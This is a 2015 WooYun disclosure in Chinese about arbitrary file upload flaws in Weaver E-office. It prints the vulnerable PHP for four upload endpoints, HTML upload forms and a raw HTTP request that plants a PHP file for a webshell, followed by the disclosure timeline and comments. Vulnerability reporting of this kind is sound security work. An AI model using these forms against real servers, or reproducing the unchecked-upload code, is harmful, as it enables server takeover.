缺陷编号:WooYun-2015-0125592
漏洞标题:泛微Eoffice 三处任意文件上传可直接getshell
相关厂商:泛微E-Office
漏洞作者:Bear baby
提交时间:2015-07-11 12:10
公开时间:2015-10-11 14:18
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:17
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
2015-07-11: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-06: 细节向核心白帽子及相关领域专家公开
2015-09-16: 细节向普通白帽子公开
2015-09-26: 细节向实习白帽子公开
2015-10-11: 细节向公众公开
在实验室奋斗了两天。。来一波
1.文件位置:/webservice/upload.php。相关代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
<?php<br> include_once( "inc/utility_all.php" );<br> $pathInfor = pathinfo( $_FILES['file']['tmp_name'] );<br> $extension = $pathInfor['extension'];<br> $role = UPLOADROLE;<br> $attachmentID = createfiledir( );<br> global $ATTACH_PATH;<br> $path = $ATTACH_PATH.$attachmentID;<br> if ( !file_exists( $path ) )<br> {<br> mkdir( $path, 448 );<br> }<br> $attachmentName = $_FILES['file']['tmp_name'];<br> $fileName = $path."/".$_FILES['file']['name'];<br> $fileName = iconv( "UTF-8", "GBK", $fileName );<br> move_uploaded_file( $_FILES['file']['tmp_name'], $fileName );<br> if ( !file_exists( $fileName ) )<br> {<br> echo "false";<br> }<br> else<br> { echo $fileName;<br> echo $attachmentID."*".$_FILES['file']['name'];<br> }<br> ?> |
没有做任何限制直接上传,文件名为原文件名,文件路径如下
1 2 |
$path = $ATTACH_PATH.$attachmentID<br> $fileName = $path."/".$_FILES['file']['name']; |
构造上传表单如下:
1 2 3 4 |
<form action="http://网站地址/webservice/upload.php" form enctype="multipart/form-data" method="POST"><br> <input name="file" type="file"><br> <input name="" type="submit"><br> </form> |
如下图,返回内容3023528241*i.php对应路径为/attachment/3023528241/i.php
2.文件位置:inc/jquery/uploadify/uploadify.php 相关代码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
<?php<br> function createFileDir( )<br> {<br> global $ATTACH_PATH;<br> mt_srand( ( double )microtime( ) * 1000000 );<br> $RADOM_ID = mt_rand( ) + mt_rand( );<br> if ( !file_exists( $ATTACH_PATH.$RADOM_ID ) )<br> {<br> return $RADOM_ID;<br> }<br> else<br> {<br> createfiledir( );<br> }<br> }if ( !empty( $_FILES ) )<br> {<br> $tempFile = $_FILES['Filedata']['tmp_name'];<br> $attachmentID = createfiledir( );<br> $uploadPath = $_REQUEST['uploadPath'];<br> if ( trim( $uploadPath ) == "" )<br> {<br> $targetPath = $_SERVER['DOCUMENT_ROOT']."/attachment/".$attachmentID;<br> }<br> else<br> {<br> $targetPath = $uploadPath."/sent/attachment/".$attachmentID;<br> }<br> if ( !file_exists( $targetPath ) )<br> {<br> mkdir( $targetPath, 448, true );<br> }<br> $targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];<br> move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );<br> echo $attachmentID;<br> }<br> ?> |
也是没有任意过滤,文件名为原文件名,可直接上传shell。
1 2 |
$targetPath = $uploadPath."/sent/attachment/".$attachmentID;<br> $targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name']; |
构造上传表单如下:
1 2 3 4 |
<form action="http://网站地址/ inc/jquery/uploadify/uploadify.php" form enctype="multipart/form-data" method="POST"><br> <input name=" Filedata" type="file"><br> <input name="" type="submit"><br> </form> |
如下图,返回内容1720699075 对应路径为/attachment/ 1720699075/2.php
3.文件位置:/general/weibo/javascript/LazyUploadify/uploadify.php部分相关代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
<?php<br> ….省略部分代码……<br> include_once( "inc/conn.php" );<br> if ( !empty( $_FILES ) )<br> {<br> $tempFile = $_FILES['Filedata']['tmp_name'];<br> $fileName = $_FILES['Filedata']['name'];<br> $thumbWidth = $_REQUEST['thumbWidth'];<br> $thumbHeight = $_REQUEST['thumbHeight'];<br> $attachmentID = createfiledir( );<br> $targetPath = ROOT_PATH."/attachment/".$attachmentID."/";<br> if ( !file_exists( $targetPath ) )<br> {<br> mkdir( $targetPath, 448, true );<br> }<br> $targetPath = str_replace( "//", "/", $targetPath );<br> $targetOriginalFile = $targetPath.$fileName;<br> $targetOriginalFile = iconv( "UTF-8", "GBK", $targetOriginalFile );<br> move_uploaded_file( $tempFile, $targetOriginalFile );<br> $fileExt = strtolower( substr( $fileName, strrpos( $fileName, "." ) ) );<br> switch ( $fileExt )<br> {<br> case ".jpg" :<br> case ".jpeg" :<br> case ".png" :<br> case ".gif" :<br> $targetThumbPath = ROOT_PATH."/attachment/thumb/".$attachmentID;<br> if ( !file_exists( $targetThumbPath ) )<br> {<br> mkdir( $targetThumbPath, 448, true );<br> }<br> $targetThumbFile = $targetThumbPath."/".$fileName;<br> $targetThumbFile = iconv( "UTF-8", "GBK", $targetThumbFile );<br> resizeimage( $targetOriginalFile, $targetThumbFile, $thumbWidth, $thumbHeight );<br> break;<br> }<br> $targetThumbFile = iconv( "GB2312", "UTF-8", $targetThumbFile );<br> $returnValue['thubmPath'] = str_replace( ROOT_PATH, "", $targetThumbFile );<br> $returnValue['attachmentID'] = $attachmentID;<br> $returnValue['attachmentName'] = $fileName;<br> $returnValue['attachmentSize'] = filesize( $targetOriginalFile );<br> echo json_encode( $returnValue );<br> }<br> ?> |
还是无任何过滤,直接getshell。表单如下:
1 2 3 4 |
<form action="http://网站地址/general/weibo/javascript/LazyUploadify/uploadify.php" form enctype="multipart/form-data" method="POST"><br> <input name="Filedata" type="file"><br> <input name="" type="submit"><br> </form> |
如下图返回为json格式。对应路径/attachment/2012291572/2.php
4.文件位置:/general/weibo/javascript/uploadify/uploadify.php部分代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 |
include_once( "inc/conn.php" );<br> include_once( "general/weibo/inc/weibo.inc.php" );<br> include_once( "general/weibo/inc/thumb_handler.php" );<br> if ( !empty( $_FILES ) )<br> {<br> if ( $_REQUEST['uploadType'] == "log" )<br> {<br> $tempFile = $_FILES['Filedata']['tmp_name'];<br> $fileName = $_FILES['Filedata']['name'];<br> $targetPath = ROOT_PATH."/attachment/";<br> $fileExt = substr( $fileName, strrpos( $fileName, "." ) );<br> $logName = "log".$fileExt;<br> $targetFile = str_replace( "//", "/", $targetPath )."/".$logName;<br> move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );<br> resize( $targetFile, $targetFile, 295, 195 );<br> $query = "SELECT * FROM unit";<br> $result = exequery( $connection, $query );<br> if ( mysql_num_rows( $result ) == 0 )<br> {<br> $query = "INSERT INTO unit (LOGO) VALUES ('".$logName."')";<br> }<br> else<br> {<br> $query = "UPDATE unit SET LOGO = '".$logName."'";<br> }<br> if ( exequery( $connection, $query ) )<br> {<br> echo $logName;<br> }<br> else<br> {<br> echo false;<br> }<br> }<br> else<br> {<br> $tempFile = $_FILES['Filedata']['tmp_name'];<br> $fileName = $_FILES['Filedata']['name'];<br> $userID = $_REQUEST['userID'];<br> $thumbWidth = $_REQUEST['thumbWidth'];<br> $thumbHeight = $_REQUEST['thumbHeight'];<br> $targetPath = ROOT_PATH."/attachment/personal/".$userID;<br> if ( !file_exists( $targetPath ) )<br> {<br> mkdir( $targetPath, 448, true );<br> }<br> $fileExt = substr( $fileName, strrpos( $fileName, "." ) );<br> $targetFile = str_replace( "//", "/", $targetPath )."/".$userID."_temp".$fileExt;<br> move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );<br> $windowWidth = $_REQUEST['windowWidth'];<br> $windowHeight = $_REQUEST['windowHeight'];<br> resize( $targetFile, $targetFile, $windowWidth - 40, $windowHeight - 100 );<br> list( $width, $height ) = getimagesize( $targetFile );<br> echo json_encode( array(<br> "width" => $width,<br> "height" => $height,<br> "imageSrc" => "/".str_replace( ROOT_PATH, "", $targetFile )<br> ) );<br> }<br> }<br> ?> |
表单可以自行构造。Fiddler请求如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
POST **.**.**.**/general/weibo/javascript/uploadify/uploadify.php?uploadType=log HTTP/1.1<br> Host: **.**.**.**<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0<br> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br> Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3<br> Accept-Encoding: gzip, deflate<br> DNT: 1<br> Cookie: zou__Session=7f895dd642da7e165f485c5a638224e4; PHPSESSID=9ed7d522a1e2caf3f2fe76082450b3a8<br> Connection: keep-alive<br> Content-Type: multipart/form-data; boundary=---------------------------94401197120954<br> Content-Length: 214-----------------------------94401197120954<br> Content-Disposition: form-data; name="Filedata"; filename="2.php"<br> Content-Type: application/x-php<?php phpinfo();?><br> -----------------------------94401197120954-- |
Shell路径即/attachment/log.php
带userID则对应路径/attachment/personal/$userID/$userID_temp.php如下图
在phith0n的案例中随意挑了个测试
危害等级:高
漏洞Rank:13
确认时间:2015-07-1314:17
CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。
暂无
哎,这个是小厂商,看样子,文件上传这几个地方被你找到了
@menmen519 昨天被你发了一波。。你找的那些我应该都有。。亏了
@Bear baby 最新版本的,漏洞比较多,文件上传应该有六处,不过收到2000的感觉不错吧
@menmen519 木有2000呢
@Bear baby 好吧,打雷那个应该有5000 高产
@Bear baby 是不是1500啊
我了个去 这直接都$$了 我再去扒拉扒拉
@menmen519 @Bear baby 两个大牛在谈笑风声
看到千元美刀优先进来参观学习
原文连接
的情况下转载,若非则不得使用我方内容。